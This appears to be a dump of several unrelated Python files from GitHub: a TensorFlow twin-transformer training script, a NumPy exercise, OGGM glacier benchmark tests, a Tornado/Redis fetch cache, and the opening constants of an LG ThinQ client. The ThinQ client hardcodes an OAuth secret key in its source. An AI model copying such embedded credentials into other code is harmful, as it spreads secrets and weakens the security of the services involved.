    s1_depth = tf.math.reduce_sum(s1_count, axis=2, keepdims=True)
    s1_count = tf.math.divide(s1_count, s1_depth)
    s2_depth = tf.math.reduce_sum(s2_count, axis=2, keepdims=True)
    s2_count = tf.math.divide(s2_count, s2_depth)

    # remove dim: drop the singleton split axis -> (BATCH_SIZE, M)
    s1_obs = tf.reshape(s1_obs,[BATCH_SIZE, -1])
    s1_count = tf.reshape(s1_count,[BATCH_SIZE, -1])
    s2_obs = tf.reshape(s2_obs,[BATCH_SIZE, -1])
    s2_count = tf.reshape(s2_count,[BATCH_SIZE, -1])
    return (s1_obs, s1_count, s2_obs, s2_count), distance
def csv_reader_dataset(file_path):
    """Build an infinite, shuffled tf.data pipeline over the text files
    matching *file_path*, batched and parsed with process_input."""
    ds = tf.data.Dataset.list_files(file_path, shuffle=False)
    ds = ds.cache()
    # repeat() makes the dataset infinite; training relies on
    # steps_per_epoch to bound each epoch.
    ds = ds.repeat()
    ds = ds.shuffle(1000)
    # Interleave lines from multiple files in parallel.
    ds = ds.interleave(
        lambda file_path: tf.data.TextLineDataset(file_path),
        cycle_length=tf.data.AUTOTUNE,
        num_parallel_calls=tf.data.AUTOTUNE)
    ds = ds.shuffle(10000)
    # Batch raw lines first, then parse whole batches at once.
    ds = ds.batch(BATCH_SIZE, num_parallel_calls=tf.data.AUTOTUNE)
    ds = ds.map(process_input, num_parallel_calls=tf.data.AUTOTUNE)
    return ds.prefetch(tf.data.AUTOTUNE)
ds = csv_reader_dataset('unifrac-dataset/training/input/*')
v_ds = csv_reader_dataset('unifrac-dataset/training/input/*')
# for (s1_obs, s1_count, s2_obs, s2_count), y in ds.take(1):
# # process_input(file)
# # print(ds.map(process_input(line)))
# print(s2_obs,s2_count)
# step 3 create model
embed_dim=128
num_heads=5
num_layers=4
ff_dim=256
max_obs=MAX_OBS_PER_SAMPLE
def build_model(mask_zero=False):
    """Assemble the twin (siamese) transformer regression model.

    Two weight-sharing branches embed the 16S and WGS observation-id
    sequences through the same transformer stack, concatenate each with
    its normalized count vector, and a dense head regresses the scalar
    distance between the paired samples (MSE loss).

    mask_zero: passed to the token embedding so padding id 0 is masked.
    """
    input_obs_16s = Input(shape=(max_obs), batch_size=BATCH_SIZE)
    input_counts_16s = Input(shape=(max_obs), batch_size=BATCH_SIZE)
    input_obs_wgs = Input(shape=(max_obs), batch_size=BATCH_SIZE)
    input_counts_wgs = Input(shape=(max_obs), batch_size=BATCH_SIZE)

    # Shared layers: both branches reuse the same embedding, transformer
    # blocks and dense projection (weight tying makes this a twin network).
    embedding_layer = TokenEmbedding(vocab, embed_dim, mask_zero=mask_zero)
    transformer_blocks = [TransformerBlock(embed_dim, num_heads, ff_dim)
                          for _ in range(num_layers)]
    trans_dense = Dense(max_obs, activation="relu")

    #################### 16s transformer twin #############################
    x_obs_16s = embedding_layer(input_obs_16s)
    for i in range(num_layers):
        x_obs_16s = transformer_blocks[i](x_obs_16s)
    # Flatten (batch, seq, embed) -> (batch, seq*embed) before concat.
    x_obs_16s = tf.reshape(x_obs_16s, [x_obs_16s.shape[0], -1])
    x_obs_16s = tf.keras.layers.Concatenate(axis=1)([x_obs_16s, input_counts_16s])
    x_obs_16s = trans_dense(x_obs_16s)

    ################### wgs transformer twin ############################
    x_obs_wgs = embedding_layer(input_obs_wgs)
    for i in range(num_layers):
        x_obs_wgs = transformer_blocks[i](x_obs_wgs)
    x_obs_wgs = tf.reshape(x_obs_wgs, [x_obs_wgs.shape[0], -1])
    x_obs_wgs = tf.keras.layers.Concatenate(axis=1)([x_obs_wgs, input_counts_wgs])
    x_obs_wgs = trans_dense(x_obs_wgs)

    ################### combine 16s and wgs ############################
    x_obs = tf.keras.layers.Concatenate(axis=1)([x_obs_16s, x_obs_wgs])
    x_obs = Dense(max_obs, activation="relu")(x_obs)
    x_obs = Dense(max_obs/2, activation="relu")(x_obs)
    outputs = Dense(1)(x_obs)

    model = Model(inputs=(input_obs_16s, input_counts_16s, input_obs_wgs, input_counts_wgs), outputs=outputs)
    # Cosine decay with warm restarts: the LR periodically resets and decays.
    learning_rate = tf.keras.optimizers.schedules.CosineDecayRestarts(0.001, 1000, alpha=0.00001, m_mul=0.98)
    optimizer = tf.keras.optimizers.Adam(learning_rate, beta_1=0.9, beta_2=0.999,
                                         epsilon=1e-8)
    model.compile(loss="mse", optimizer=optimizer)
    return model
model = build_model(mask_zero=True)
cp_callback = tf.keras.callbacks.ModelCheckpoint('unifrac-dataset/checkpoint/cp.ckpt',
save_weights_only=True,
verbose=1)
model.load_weights('unifrac-dataset/checkpoint/cp.ckpt')
# model.fit(ds,steps_per_epoch=1000, epochs=120, validation_steps=1000,callbacks=[cp_callback])
print(model.predict(v_ds , steps=1))
for x, y in ds.take(1):
pred_y = model.call(x, training=False)
print(y, pred_y)
# print(y)
| kwcantrell/scale-16s | transformer/16s_wgs_unifrac_twin_transformer.py | 16s_wgs_unifrac_twin_transformer.py | py | 5,236 | python | en | code | 0 | github-code | 13 |
14803486985 | # -*- coding: utf-8 -*-
"""
Created on Mon May 20 11:48:14 2019
@author: King23
"""
"""
Code Challenge
Name:
Space Seperated data
Filename:
space_numpy.py
Problem Statement:
You are given a 9 space separated numbers.
Write a python code to convert it into a 3x3 NumPy array of integers.
Input:
6 9 2 3 5 8 1 5 4
Output:
[[6 9 2]
[3 5 8]
[1 5 4]]
"""
import numpy as np


def to_grid(text):
    """Parse 9 space-separated numbers into a 3x3 integer ndarray.

    dtype=int converts the string tokens to integers, as the problem
    statement requires (np.array on split() tokens alone would produce
    a string-dtype array, printing ['6' '9' '2'] instead of [6 9 2]).
    """
    return np.array(text.split(), dtype=int).reshape(3, 3)


if __name__ == '__main__':
    print(to_grid(input()))
39814477630 | # Python imports
import unittest
import geopandas as gpd
import numpy as np
import os
import shutil
import salem
import oggm
# Locals
import oggm.cfg as cfg
from oggm import tasks, utils, workflow
from oggm.workflow import execute_entity_task
from oggm.tests.funcs import get_test_dir
from oggm.tests import RUN_BENCHMARK_TESTS
from oggm.utils import get_demo_file
from oggm.core.massbalance import ConstantMassBalance
# do we event want to run the tests?
if not RUN_BENCHMARK_TESTS:
raise unittest.SkipTest('Skipping all benchmark tests.')
do_plot = False
class TestSouthGlacier(unittest.TestCase):
    """Benchmark the OGGM mass-balance and inversion workflows against
    the South Glacier ITMIX dataset.
    """
    # Test case obtained from ITMIX
    # Data available at:
    # oggm-sample-data/tree/master/benchmarks/south_glacier
    #
    # Citation:
    #
    # Flowers, G.E., N. Roux, S. Pimentel, and C.G. Schoof (2011). Present
    # dynamics and future prognosis of a slowly surging glacier.
    # The Cryosphere, 5, 299-313. DOI: 10.5194/tc-5-299-2011, 2011.
    def setUp(self):
        """Create a fresh working directory and initialize OGGM config."""
        # test directory
        self.testdir = os.path.join(get_test_dir(), 'tmp')
        if not os.path.exists(self.testdir):
            os.makedirs(self.testdir)
        self.clean_dir()
        # Init
        cfg.initialize()
        cfg.PATHS['working_dir'] = self.testdir
        cfg.PATHS['dem_file'] = get_demo_file('dem_SouthGlacier.tif')
        cfg.PATHS['cru_dir'] = os.path.dirname(cfg.PATHS['dem_file'])
        cfg.PARAMS['border'] = 10
    def tearDown(self):
        """Remove the working directory after each test."""
        self.rm_dir()
    def rm_dir(self):
        # Delete the working directory entirely.
        shutil.rmtree(self.testdir)
    def clean_dir(self):
        # Recreate an empty working directory.
        shutil.rmtree(self.testdir)
        os.makedirs(self.testdir)
    def test_mb(self):
        """Compare OGGM's mass balance at t* with the observed MB grid."""
        # This is a function to produce the MB function needed by Anna
        # Download the RGI file for the run
        # Make a new dataframe of those
        rgidf = gpd.read_file(get_demo_file('SouthGlacier.shp'))
        # Go - initialize working directories
        gdirs = workflow.init_glacier_regions(rgidf)
        # Preprocessing tasks
        task_list = [
            tasks.glacier_masks,
            tasks.compute_centerlines,
            tasks.initialize_flowlines,
            tasks.catchment_area,
            tasks.catchment_intersections,
            tasks.catchment_width_geom,
            tasks.catchment_width_correction,
        ]
        for task in task_list:
            execute_entity_task(task, gdirs)
        # Climate tasks -- only data IO and tstar interpolation!
        execute_entity_task(tasks.process_cru_data, gdirs)
        tasks.distribute_t_stars(gdirs)
        execute_entity_task(tasks.apparent_mb, gdirs)
        # Reference MB and DEM rasters shipped with the demo data.
        mbref = salem.GeoTiff(get_demo_file('mb_SouthGlacier.tif'))
        demref = salem.GeoTiff(get_demo_file('dem_SouthGlacier.tif'))
        mbref = mbref.get_vardata()
        mbref[mbref == -9999] = np.NaN
        demref = demref.get_vardata()[np.isfinite(mbref)]
        mbref = mbref[np.isfinite(mbref)] * 1000
        # compute the bias to make it 0 SMB on the 2D DEM
        mbmod = ConstantMassBalance(gdirs[0], bias=0)
        mymb = mbmod.get_annual_mb(demref) * cfg.SEC_IN_YEAR * cfg.RHO
        mbmod = ConstantMassBalance(gdirs[0], bias=np.average(mymb))
        mymb = mbmod.get_annual_mb(demref) * cfg.SEC_IN_YEAR * cfg.RHO
        np.testing.assert_allclose(np.average(mymb), 0., atol=1e-3)
        # Same for ref
        mbref = mbref - np.average(mbref)
        np.testing.assert_allclose(np.average(mbref), 0., atol=1e-3)
        # Fit poly
        p = np.polyfit(demref, mbref, deg=2)
        poly = np.poly1d(p)
        myfit = poly(demref)
        np.testing.assert_allclose(np.average(myfit), 0., atol=1e-3)
        if do_plot:
            import matplotlib.pyplot as plt
            plt.scatter(mbref, demref, s=5, label='Obs (2007-2012), shifted to '
                                                  'Avg(SMB) = 0')
            plt.scatter(mymb, demref, s=5, label='OGGM MB at t*')
            plt.scatter(myfit, demref, s=5, label='Polyfit', c='C3')
            plt.xlabel('MB (mm w.e yr-1)')
            plt.ylabel('Altidude (m)')
            plt.legend()
            plt.show()
    def test_workflow(self):
        """Run the full inversion workflow and sanity-check thickness."""
        # This is a check that the inversion workflow works fine
        # Download the RGI file for the run
        # Make a new dataframe of those
        rgidf = gpd.read_file(get_demo_file('SouthGlacier.shp'))
        # Go - initialize working directories
        gdirs = workflow.init_glacier_regions(rgidf)
        # Preprocessing tasks
        task_list = [
            tasks.glacier_masks,
            tasks.compute_centerlines,
            tasks.initialize_flowlines,
            tasks.catchment_area,
            tasks.catchment_intersections,
            tasks.catchment_width_geom,
            tasks.catchment_width_correction,
        ]
        for task in task_list:
            execute_entity_task(task, gdirs)
        # Climate tasks -- only data IO and tstar interpolation!
        execute_entity_task(tasks.process_cru_data, gdirs)
        tasks.distribute_t_stars(gdirs)
        execute_entity_task(tasks.apparent_mb, gdirs)
        # Inversion tasks
        execute_entity_task(tasks.prepare_for_inversion, gdirs)
        # We use the default parameters for this run
        execute_entity_task(tasks.volume_inversion, gdirs, glen_a=cfg.A, fs=0)
        execute_entity_task(tasks.filter_inversion_output, gdirs)
        df = utils.glacier_characteristics(gdirs)
        assert df.inv_thickness_m[0] < 100
        if do_plot:
            import matplotlib.pyplot as plt
            from oggm.graphics import plot_inversion
            plot_inversion(gdirs)
            plt.show()
| Chris35Wills/oggm | oggm/tests/test_benchmarks.py | test_benchmarks.py | py | 5,681 | python | en | code | null | github-code | 13 |
7706597277 | import tornado.httpclient
import redis
from tornado.options import options
import tornado.gen
from tornado.log import logging
import os
# Shared Redis client; the host comes from the Docker linked-container
# env var when present, otherwise localhost.
r = redis.Redis(host=os.environ.get("REDIS_PORT_6379_TCP_ADDR", "localhost"))
# Module-level logger for fetch diagnostics.
logger = logging.getLogger('fetcher')
logger.setLevel(logging.DEBUG)
@tornado.gen.coroutine
def get_data(key):
    """Return the cached string stored under *key*, or None on a cache
    miss or on any Redis failure (cache errors are logged, never
    propagated to the caller).
    """
    global r
    try:
        cached = r.get(key)
        return cached.decode() if cached else None
    except Exception:
        # Fix: use the module-level `logger` (not the root logger) and
        # logger.exception, which records the traceback in one call;
        # logging.warn is a deprecated alias for warning().
        logger.exception('Fail to connect to the redis cache server')
        return None
@tornado.gen.coroutine
def write_data(key, value, timeout):
    """Store *value* under *key* with a TTL of *timeout*, swallowing and
    logging any Redis failure (caching is best-effort).
    """
    global r
    try:
        # NOTE(review): redis-py >= 3.0 defines setex(name, time, value);
        # this call passes (key, value, timeout), which only matches the
        # legacy pre-3.0 `Redis` class signature (name, value, time).
        # Confirm against the installed redis-py version.
        r.setex(key, value, timeout)
    except Exception as e:
        logging.exception(e)
        logging.warn('Fail to connect to the redis cache server')
@tornado.gen.coroutine
def get_page(url):
    """Fetch *url* through the shared cache.

    A cached copy is served when present (cached empty-list payloads
    "[]" are deliberately ignored); otherwise the page is fetched,
    successful responses are cached for CACHE_TIME, and the raw body is
    returned.
    """
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
    }
    hit = yield get_data(url)
    if hit and hit != "[]":
        return hit
    response = yield tornado.httpclient.AsyncHTTPClient().fetch(url, headers=headers)
    if 300 >= response.code >= 200:
        yield write_data(url, response.body, options.CACHE_TIME)
    logger.debug("fetch %s, %d", url, response.code)
    return response.body
| cnssnewscenter/CNSS_mobile_news_center | fetcher.py | fetcher.py | py | 1,524 | python | en | code | 0 | github-code | 13 |
11964687042 | import requests
from urllib.parse import urljoin, urlencode, urlparse, parse_qs
import uuid
import base64
import json
import hashlib
import hmac
from datetime import datetime, timedelta
from collections import namedtuple
import enum
import time
GATEWAY_URL = 'https://kic.lgthinq.com:46030/api/common/gatewayUriList'
APP_KEY = 'wideq'
SECURITY_KEY = 'nuts_securitykey'
DATA_ROOT = 'lgedmRoot'
COUNTRY = 'SE'
LANGUAGE = 'sv-SE'
SVC_CODE = 'SVC202'
CLIENT_ID = 'LGAO221A02'
OAUTH_SECRET_KEY = 'c053c2a6ddeb7ad97cb0eed0dcb31cf8'
OAUTH_CLIENT_KEY = 'LGAO221A02'
DATE_FORMAT = '%a, %d %b %Y %H:%M:%S +0000'
"""HVAC STATE"""
STATE_COOL = "Cool"
STATE_DRY = "Dry"
STATE_AIRCLEAN = 'ON'
STATE_AIRCLEAN_OFF = 'OFF'
STATE_SMARTCARE = 'ON'
STATE_SMARTCARE_OFF = 'OFF'
STATE_AUTODRY = 'ON'
STATE_AUTODRY_OFF = 'OFF'
STATE_POWERSAVE = 'ON'
STATE_POWERSAVE_OFF = 'OFF'
STATE_COOLPOWER = 'ON'
STATE_COOLPOWER_OFF = 'OFF'
STATE_LONGPOWER = 'ON'
STATE_LONGPOWER_OFF = 'OFF'
STATE_LOW = "Low"
STATE_MID = "Mid"
STATE_HIGH = "High"
STATE_RIGHT_LOW_LEFT_MID = "Right low left mid"
STATE_RIGHT_LOW_LEFT_HIGH = "Right low left high"
STATE_RIGHT_MID_LEFT_LOW = "Right mid left low"
STATE_RIGHT_MID_LEFT_HIGH = "Right mid left high"
STATE_RIGHT_HIGH_LEFT_LOW = "Right high left low"
STATE_RIGHT_HIGH_LEFT_MID = "Right high left mid"
STATE_RIGHT_ONLY_LOW = "Right only low"
STATE_RIGHT_ONLY_MID = "Right only mid"
STATE_RIGHT_ONLY_HIGH = "Right only high"
STATE_LEFT_ONLY_LOW = "Left only low"
STATE_LEFT_ONLY_MID = "Left only mid"
STATE_LEFT_ONLY_HIGH = "Left only high"
STATE_LEFT_RIGHT = "Left right"
STATE_RIGHTSIDE_LEFT_RIGHT = "Rightside left right"
STATE_LEFTSIDE_LEFT_RIGHT = "Leftside left right"
STATE_LEFT_RIGHT_STOP = "Left right stop"
STATE_UP_DOWN = 'ON'
STATE_UP_DOWN_STOP = 'OFF'
"""REFRIGERATOR STATE"""
STATE_ICE_PLUS = 'ON'
STATE_ICE_PLUS_OFF = 'OFF'
STATE_FRESH_AIR_FILTER_POWER = "Fresh air filter power"
STATE_FRESH_AIR_FILTER_AUTO = "Fresh air filter auto"
STATE_FRESH_AIR_FILTER_OFF = "Fresh air filter off"
STATE_SMART_SAVING_NIGHT = 'NIGHT'
STATE_SMART_SAVING_CUSTOM = 'CUSTOM'
STATE_SMART_SAVING_OFF = 'OFF'
"""DRYER STATE"""
STATE_DRYER_POWER_OFF = "N/A"
STATE_DRYER_OFF = "Power Off"
STATE_DRYER_DRYING = "Drying"
STATE_DRYER_SMART_DIAGNOSIS = "Smart Diagnosis"
STATE_DRYER_WRINKLE_CARE = "Wrinkle Care"
STATE_DRYER_INITIAL = "Initial"
STATE_DRYER_RUNNING = "Running"
STATE_DRYER_PAUSE = "Pause"
STATE_DRYER_COOLING = "Cooling"
STATE_DRYER_END = "End"
STATE_DRYER_ERROR = "Error"
STATE_DRYER_PROCESS_DETECTING = "Dryer process detecting"
STATE_DRYER_PROCESS_STEAM = "Dryer process steam"
STATE_DRYER_PROCESS_DRY = "Dryer process dry"
STATE_DRYER_PROCESS_COOLING = "Dryer process cooling"
STATE_DRYER_PROCESS_ANTI_CREASE = "Dryer process anti crease"
STATE_DRYER_PROCESS_END = "Dryer process end"
STATE_DRY_LEVEL_IRON = "Iron"
STATE_DRY_LEVEL_CUPBOARD = "Cupboard"
STATE_DRY_LEVEL_EXTRA = "Extra"
STATE_DRY_LEVEL_DAMP = "Damp"
STATE_DRY_LEVEL_LESS = "Less"
STATE_DRY_LEVEL_MORE = "More"
STATE_DRY_LEVEL_NORMAL = "Normal"
STATE_DRY_LEVEL_VERY = "Very"
STATE_DRY_TEMP_ULTRA_LOW = "Ultra Low"
STATE_DRY_TEMP_LOW = "Low"
STATE_DRY_TEMP_MEDIUM = "Medium"
STATE_DRY_TEMP_MID_HIGH = "Mid High"
STATE_DRY_TEMP_HIGH = "High"
STATE_ECOHYBRID_ECO = "Ecohybrid eco"
STATE_ECOHYBRID_NORMAL = "Ecohybrid normal"
STATE_ECOHYBRID_TURBO = "Ecohybrid turbo"
STATE_COURSE_COTTON_SOFT = "Cotton Soft"
STATE_COURSE_BULKY_ITEM = "Bulky Item"
STATE_COURSE_EASY_CARE = "Easy Care"
STATE_COURSE_COTTON = "Cotton"
STATE_COURSE_SPORTS_WEAR = "Sports Wear"
STATE_COURSE_QUICK_DRY = "Quick Dry"
STATE_COURSE_WOOL = "Wool"
STATE_COURSE_RACK_DRY = "Rack Dry"
STATE_COURSE_COOL_AIR = "Cool Air"
STATE_COURSE_WARM_AIR = "Warm Air"
STATE_COURSE_BEDDING_BRUSH = "Bedding Brush"
STATE_COURSE_STERILIZATION = "Sterilization"
STATE_COURSE_POWER = "Power"
STATE_COURSE_REFRESH = "Refresh"
STATE_COURSE_NORMAL = "Normal"
STATE_COURSE_SPEED_DRY = "Speed Dry"
STATE_COURSE_HEAVY_DUTY = "Heavy Duty"
STATE_COURSE_NORMAL = "Normal"
STATE_COURSE_PERM_PRESS = "Permenant Press"
STATE_COURSE_DELICATES = "Delicates"
STATE_COURSE_BEDDING = "Bedding"
STATE_COURSE_AIR_DRY = "Air Dry"
STATE_COURSE_TIME_DRY = "Time Dry"
STATE_SMARTCOURSE_GYM_CLOTHES = "Smartcourse gym clothes"
STATE_SMARTCOURSE_RAINY_SEASON = "Smartcourse rainy season"
STATE_SMARTCOURSE_DEODORIZATION = "Smartcourse deodorization"
STATE_SMARTCOURSE_SMALL_LOAD = "Smartcourse small load"
STATE_SMARTCOURSE_LINGERIE = "Smartcourse lingerie"
STATE_SMARTCOURSE_EASY_IRON = "Smartcourse easy iron"
STATE_SMARTCOURSE_SUPER_DRY = "Smartcourse super dry"
STATE_SMARTCOURSE_ECONOMIC_DRY = "Smartcourse economic dry"
STATE_SMARTCOURSE_BIG_SIZE_ITEM = "Smartcourse big size item"
STATE_SMARTCOURSE_MINIMIZE_WRINKLES = "Smartcourse minimize wrinkles"
STATE_SMARTCOURSE_FULL_SIZE_LOAD = "Smartcourse full size load"
STATE_SMARTCOURSE_JEAN = "Smartcourse jean"
STATE_ERROR_DOOR = "Error door"
STATE_ERROR_DRAINMOTOR = "Error drainmotor"
STATE_ERROR_LE1 = "Error le1"
STATE_ERROR_TE1 = "Error te1"
STATE_ERROR_TE2 = "Error te2"
STATE_ERROR_F1 = "Error f1"
STATE_ERROR_LE2 = "Error le2"
STATE_ERROR_AE = "Error ae"
STATE_ERROR_dE4 = "Error de4"
STATE_ERROR_NOFILTER = "Error nofilter"
STATE_ERROR_EMPTYWATER = "Error emptywater"
STATE_ERROR_CE1 = "Error ce1"
STATE_NO_ERROR = "No Error"
STATE_OPTIONITEM_ON = "On"
STATE_OPTIONITEM_OFF = "Off"
"""WASHER STATE"""
STATE_WASHER_OFF = "Power Off"
STATE_WASHER_POWER_OFF = "N/A"
STATE_WASHER_INITIAL = "Initial"
STATE_WASHER_PAUSE = "Pause"
STATE_WASHER_ERROR_AUTO_OFF = "Error auto off"
STATE_WASHER_RESERVE = "Reserve"
STATE_WASHER_DETECTING = "Detecting"
STATE_WASHER_ADD_DRAIN = "Add drain"
STATE_WASHER_DETERGENT_AMOUT = "Detergent amout"
STATE_WASHER_RUNNING = "Running"
STATE_WASHER_PREWASH = "Pre-wash"
STATE_WASHER_RINSING = "Rinsing"
STATE_WASHER_RINSE_HOLD = "Rinse Hold"
STATE_WASHER_SPINNING = "Spinning"
STATE_WASHER_SOAK = "Soaking"
STATE_WASHER_COMPLETE = "Complete"
STATE_WASHER_FIRMWARE = "Firmware"
STATE_WASHER_SMART_DIAGNOSIS = "Smart Diagnosis"
STATE_WASHER_DRYING = "Drying"
STATE_WASHER_END = "End"
STATE_WASHER_FRESHCARE = "Freshcare"
STATE_WASHER_TCL_ALARM_NORMAL = "TCL alarm normal"
STATE_WASHER_FROZEN_PREVENT_INITIAL = "Frozen prevent initial"
STATE_WASHER_FROZEN_PREVENT_RUNNING = "Frozen prevent running"
STATE_WASHER_FROZEN_PREVENT_PAUSE = "Frozen prevent pause"
STATE_WASHER_ERROR = "Error"
STATE_WASHER_SOILLEVEL_LIGHT = "Light"
STATE_WASHER_SOILLEVEL_LIGHT_NORMAL = "Light Normal"
STATE_WASHER_SOILLEVEL_NORMAL = "Normal"
STATE_WASHER_SOILLEVEL_NORMAL_HEAVY = "Normal Heavy"
STATE_WASHER_SOILLEVEL_HEAVY = "Heavy"
STATE_WASHER_SOILLEVEL_PRE_WASH = "Pre-wash"
STATE_WASHER_SOILLEVEL_SOAKING = "Soaking"
STATE_WASHER_WATERTEMP_TAP_COLD = "Tap Cold"
STATE_WASHER_WATERTEMP_COLD = "Cold"
STATE_WASHER_WATERTEMP_SEMI_WARM = "Semi-Warm"
STATE_WASHER_WATERTEMP_WARM = "Warm"
STATE_WASHER_WATERTEMP_HOT = "Hot"
STATE_WASHER_WATERTEMP_EXTRA_HOT = "Extra Hot"
STATE_WASHER_WATERTEMP_30 = '30'
STATE_WASHER_WATERTEMP_40 = '40'
STATE_WASHER_WATERTEMP_60 = '60'
STATE_WASHER_WATERTEMP_95 = '95'
STATE_WASHER_SPINSPEED_NO_SELET = "No select"
STATE_WASHER_SPINSPEED_EXTRA_LOW = "Extra Low"
STATE_WASHER_SPINSPEED_LOW = "Low"
STATE_WASHER_SPINSPEED_MEDIUM = "Medium"
STATE_WASHER_SPINSPEED_HIGH = "High"
STATE_WASHER_SPINSPEED_EXTRA_HIGH = "Extra High"
STATE_WASHER_RINSECOUNT_1 = "Washer rinsecount 1"
STATE_WASHER_RINSECOUNT_2 = "Washer rinsecount 2"
STATE_WASHER_RINSECOUNT_3 = "Washer rinsecount 3"
STATE_WASHER_RINSECOUNT_4 = "Washer rinsecount 4"
STATE_WASHER_RINSECOUNT_5 = "Washer rinsecount 5"
STATE_WASHER_DRYLEVEL_WIND = "Washer drylevel wind"
STATE_WASHER_DRYLEVEL_TURBO = "Washer drylevel turbo"
STATE_WASHER_DRYLEVEL_TIME_30 = "Washer drylevel time 30"
STATE_WASHER_DRYLEVEL_TIME_60 = "Washer drylevel time 60"
STATE_WASHER_DRYLEVEL_TIME_90 = "Washer drylevel time 90"
STATE_WASHER_DRYLEVEL_TIME_120 = "Washer drylevel time 120"
STATE_WASHER_DRYLEVEL_TIME_150 = "Washer drylevel time 150"
STATE_WASHER_NO_ERROR = "No Error"
STATE_WASHER_ERROR_dE2 = "Washer error de2"
STATE_WASHER_ERROR_IE = "Washer error ie"
STATE_WASHER_ERROR_OE = "Washer error oe"
STATE_WASHER_ERROR_UE = "Washer error ue"
STATE_WASHER_ERROR_FE = "Washer error fe"
STATE_WASHER_ERROR_PE = "Washer error pe"
STATE_WASHER_ERROR_LE = "Washer error le"
STATE_WASHER_ERROR_tE = "Washer error te"
STATE_WASHER_ERROR_dHE = "Washer error dhe"
STATE_WASHER_ERROR_CE = "Washer error ce"
STATE_WASHER_ERROR_PF = "Washer error pf"
STATE_WASHER_ERROR_FF = "Washer error ff"
STATE_WASHER_ERROR_dCE = "Washer error dce"
STATE_WASHER_ERROR_EE = "Washer error ee"
STATE_WASHER_ERROR_PS = "Washer error ps"
STATE_WASHER_ERROR_dE1 = "Washer error de1"
STATE_WASHER_ERROR_LOE = "Washer error loe"
STATE_WASHER_APCOURSE_COTTON = "Washer apcourse cotton"
STATE_WASHER_APCOURSE_SPEEDWASH_DRY = "Washer apcourse speedwash dry"
STATE_WASHER_APCOURSE_SPEEDWASH = "Washer apcourse speedwash"
STATE_WASHER_APCOURSE_SINGLE_SHIRT_DRY = "Washer apcourse single shirt dry"
STATE_WASHER_APCOURSE_RINSESPIN = "Washer apcourse rinsespin"
STATE_WASHER_APCOURSE_SPEEDBOIL = "Washer apcourse speedboil"
STATE_WASHER_APCOURSE_ALLERGYCARE = "Washer apcourse allergycare"
STATE_WASHER_APCOURSE_STEAMCLEANING = "Washer apcourse steamcleaning"
STATE_WASHER_APCOURSE_BABYWEAR = "Washer apcourse babywear"
STATE_WASHER_APCOURSE_BLANKET_ROB = "Washer apcourse blanket rob"
STATE_WASHER_APCOURSE_UTILITY = "Washer apcourse utility"
STATE_WASHER_APCOURSE_BLANKET = "Washer apcourse blanket"
STATE_WASHER_APCOURSE_LINGERIE_WOOL = "Washer apcourse lingerie wool"
STATE_WASHER_APCOURSE_COLDWASH = "Washer apcourse coldwash"
STATE_WASHER_APCOURSE_TUBCLEAN_SANITARY = "Washer apcourse tubclean sanitary"
STATE_WASHER_APCOURSE_DOWNLOAD_COUSE = "Washer apcourse download couse"
STATE_WASHER_COURSE_NORMAL = "Normal"
STATE_WASHER_COURSE_HEAVY_DUTY = "Heavy Duty"
STATE_WASHER_COURSE_DELICATES = "Delicates"
STATE_WASHER_COURSE_WATER_PROOF = "Waterproof"
STATE_WASHER_COURSE_SPEED_WASH = "Speed Wash"
STATE_WASHER_COURSE_BEDDING = "Bedding"
STATE_WASHER_COURSE_TUB_CLEAN = "Tub Clean"
STATE_WASHER_COURSE_RINSE_SPIN = "Rinse Spin"
STATE_WASHER_COURSE_SPIN_ONLY = "Spin Only"
STATE_WASHER_COURSE_PREWASH_PLUS = "Prewash Plus"
STATE_WASHER_SMARTCOURSE_SILENT = "Washer smartcourse silent"
STATE_WASHER_SMARTCOURSE_SMALL_LOAD = "Washer smartcourse small load"
STATE_WASHER_SMARTCOURSE_SKIN_CARE = "Washer smartcourse skin care"
STATE_WASHER_SMARTCOURSE_RAINY_SEASON = "Washer smartcourse rainy season"
STATE_WASHER_SMARTCOURSE_SWEAT_STAIN = "Washer smartcourse sweat stain"
STATE_WASHER_SMARTCOURSE_SINGLE_GARMENT = "Washer smartcourse single garment"
STATE_WASHER_SMARTCOURSE_SCHOOL_UNIFORM = "Washer smartcourse school uniform"
STATE_WASHER_SMARTCOURSE_STATIC_REMOVAL = "Washer smartcourse static removal"
STATE_WASHER_SMARTCOURSE_COLOR_CARE = "Washer smartcourse color care"
STATE_WASHER_SMARTCOURSE_SPIN_ONLY = "Washer smartcourse spin only"
STATE_WASHER_SMARTCOURSE_DEODORIZATION = "Washer smartcourse deodorization"
STATE_WASHER_SMARTCOURSE_BEDDING_CARE = "Washer smartcourse bedding care"
STATE_WASHER_SMARTCOURSE_CLOTH_CARE = "Washer smartcourse cloth care"
STATE_WASHER_SMARTCOURSE_SMART_RINSE = "Washer smartcourse smart rinse"
STATE_WASHER_SMARTCOURSE_ECO_WASH = "Washer smartcourse eco wash"
STATE_WASHER_TERM_NO_SELECT = "N/A"
STATE_WASHER_OPTIONITEM_ON = "On"
STATE_WASHER_OPTIONITEM_OFF = "Off"
"""DEHUMIDIFIER STATE"""
STATE_DEHUM_ON = '동작 중'
STATE_DEHUM_OFF = '꺼짐'
STATE_DEHUM_OPMODE_SMART_DEHUM = '스마트제습'
STATE_DEHUM_OPMODE_FAST_DEHUM = '쾌속제습'
STATE_DEHUM_OPMODE_SILENT_DEHUM = '저소음제습'
STATE_DEHUM_OPMODE_CONCENTRATION_DRY = '집중건조'
STATE_DEHUM_OPMODE_CLOTHING_DRY = '의류건조'
STATE_DEHUM_OPMODE_IONIZER = '공기제균'
STATE_DEHUM_WINDSTRENGTH_LOW = '약풍'
STATE_DEHUM_WIDESTRENGTH_HIGH = '강풍'
STATE_DEHUM_AIRREMOVAL_ON = '켜짐'
STATE_DEHUM_AIRREMOVAL_OFF = '꺼짐'
"""WATERPURIFIER STATE"""
STATE_WATERPURIFIER_COCKCLEAN_WAIT = '셀프케어 대기 중'
STATE_WATERPURIFIER_COCKCLEAN_ON = '셀프케어 진행 중'
"""AIRPURIFIER STATE"""
STATE_AIRPURIFIER_ON = '켜짐'
STATE_AIRPURIFIER_OFF = '꺼짐'
STATE_AIRPURIFIER_CIRCULATOR_CLEAN = '클린부스터'
STATE_AIRPURIFIER_BABY_CARE = '싱글청정'
STATE_AIRPURIFIER_CLEAN = '청정모드'
STATE_AIRPURIFIER_DUAL_CLEAN = '듀얼청정'
STATE_AIRPURIFIER_AUTO_MODE = '오토모드'
STATE_AIRPURIFIER_LOWST_LOW = '최약'
STATE_AIRPURIFIER_LOWST = '미약'
